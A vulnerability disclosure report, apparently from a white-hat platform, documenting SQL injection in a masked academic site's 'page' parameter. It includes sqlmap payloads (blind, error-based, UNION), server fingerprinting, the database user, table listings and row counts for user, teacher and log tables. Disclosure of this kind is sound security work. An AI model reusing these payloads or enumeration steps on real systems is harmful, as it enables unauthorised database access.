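2016-01-13: Details reported to the vendor; awaiting vendor handling
2016-01-14: Vendor confirmed; details disclosed to the vendor only
2016-01-24: Details disclosed to core white hats and experts in related fields
2016-02-03: Details disclosed to regular white hats
2016-02-13: Details disclosed to intern white hats
2016-02-27: Details disclosed to the public
Injection point: error-based injection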
http://**.**.**.**/modules-Eng.php?page=IntroductionEng
Enumerating the databases directly:
Place: GET
Parameter: page
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=IntroductionEng' AND 9770=9770 AND 'iNlN'='iNlN

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: page=IntroductionEng' AND (SELECT 1024 FROM(SELECT C0x3a64616e3a,(SELECT (CASE WHEN (1024=1024) THEN 1 ELSE 0 END)),0OR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x'uQum

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: page=IntroductionEng' UNION ALL SELECT NULL, NULL, Ce3a,0x474a5869624f50495a4e,0x3a706a713a), NULL, NULL, NULL, NULL,D 'TwRs'='TwRs
---
[14:31:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0
[14:31:58] [INFO] fetching database names
[14:32:00] [INFO] the SQL query used returns 2 entries
[14:32:02] [INFO] retrieved: information_schema
[14:32:03] [INFO] retrieved: geomatics
available databases [2]:
[*] geomatics
[*] information_schema

[14:33:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0
[14:33:32] [INFO] fetching current user
[14:33:33] [INFO] heuristics detected web page charset 'ascii'
[14:33:33] [INFO] retrieved: becare@localhost
current user: 'becare@localhost'
70 tables are involved:
Database: information_schema
[40 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| INNODB_BUFFER_PAGE                    |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_TRX                            |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

Database: geomatics
[32 tables]
+---------------------------------------+
| `alumni-bak`                          |
| alumni                                |
| bbs                                   |
| blockip                               |
| files                                 |
| filesII                               |
| filesIII                              |
| graduation_photo                      |
| ieet_course_pdf_file                  |
| ieet_course_pdf_type                  |
| invite                                |
| invite_count                          |
| lesson                                |
| lessoneng                             |
| log                                   |
| menubar                               |
| news                                  |
| newsII                                |
| newsIII                               |
| news_class                            |
| page                                  |
| paper                                 |
| source                                |
| sys_log                               |
| teacher                               |
| teacher_data                          |
| teacher_memo                          |
| teacher_position                      |
| thesis                                |
| user                                  |
| user_group                            |
| user_group_weight                     |
+---------------------------------------+

Database: geomatics
+-------+---------+
| Table | Entries |
+-------+---------+
| user  | 34      |
+-------+---------+

Database: geomatics
+---------+---------+
| Table   | Entries |
+---------+---------+
| teacher | 43      |
+---------+---------+
More than 20,000 log entries:
Database: geomatics
+-------+---------+
| Table | Entries |
+-------+---------+
| log   | 28726   |
+-------+---------+
Severity: High
Vulnerability rank: 16
Confirmed: 2016-01-14 03:33
Thank you for the report.
None yet